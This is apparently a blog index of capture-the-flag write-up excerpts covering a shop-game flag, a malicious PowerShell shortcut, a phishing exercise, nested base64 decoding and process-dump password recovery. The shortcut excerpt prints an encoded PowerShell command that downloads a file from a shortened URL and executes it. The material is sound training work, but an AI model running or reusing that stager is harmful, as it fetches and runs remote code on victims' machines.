2024-10-04 | #
Summary Author: @JohnHammond Wham! Bam! Amazon is entering the hacking business! Can you buy a flag? Steps I started the docker instance and navigated to the challenge and was presented with this game. Selecting 1, I see there’s nothing in my inventory. Going to the option to buy items, I see I can buy various items including a flag. However, the flag costs 1000000000, and I have 50 available to me.
2024-10-03
Summary Author: @JohnHammond My PowerShell has been acting really weird!! It takes a few seconds to start up, and sometimes it just crashes my computer!?!?! :( Steps Downloaded the challenge file on my Windows VM downloads as russian_roulette.zip and unzipped it with the challenge password. Inside the .zip file was a powershell.lnk file. The target was powershell command executing a base64 encoded string. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= Decoding the base64 string I see the powershell.
2024-10-02 | #
Summary Author: Truman Kain (@truman.huntress), Adam Rice (@adam.huntress) You are to conduct a phishing excercise against our client, Pyrch Data. We've identified the Marketing Director, Sarah Williams (swilliams@pyrchdata.com), as a user susceptible to phishing. Are you able to successfully phish her? Remember your OSINT ;) NOTE: The port that becomes accessible upon challenge deployment is an SMTP server. Please use this for sending any phishing emails. You will not receive an email/human response as the mail infrastructure for this challenge is emulated.
2024-10-01 | #
Summary Author: @JohnHammond This is a dumb challenge. I'm sorry. Steps I downloaded the challenge file to kali quickly noticed the text is more likely encoded with base64. Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYySkVU bGhoTVVwVVZtcEJlRll5U2tWVQpiR2hvVFZWd1ZWWnRjRUpsUmxsNVUydFdWUXBpUjJodlZGWldk MVpXV25SalJVcHNVbXhzTlZVeWRGZFdVWEJwVWpKb2RsWkdXbGRrCk1WcFhWMjVTYWxKVmNITlZi WGh6VGxaVmVXUkdaRmRWV0VKd1ZXcEtiMlJzV2tkWGJHUnJDazFXY0ZoV01qVlRZV3hLVm1OSVRs WmkKV0doNlZHeGFWbVZYVWtkYVJtUldWMFZLZDFaWGNFdGlNbEp6VjJ0a1dHSkhVbkpEYXpGWFkw Wm9WMDFxVmxSWlYzaExWbTFPU1ZScwpXbWtLVjBkb05sWkhlR0ZXYlZaWVZXdGtZVkp0VWxkV01G .... Using cat base64by32 | base64 -d I see another base64 result. Next I executed cat base64by32 | base64 -d | wc -l and see a result of 6310. Doing that again, by running cat base64by32 | base64 -d | base64 -d wc -l the result continues to get smaller.
2024-10-01 | #
Summary Author: @JohnHammond Uh oh! Mimi forgot her password for her Windows laptop! Luckily, she dumped one of the crucial processes running on her computer (don't ask me why, okay)... can you help her recover her password? NOTE: This file on its own is not malware per say, but it is likely to raise antivirus alerts. Would recommend examining this inside of a virtual environment. Steps I downloaded the file and extracted it on my Linux system.
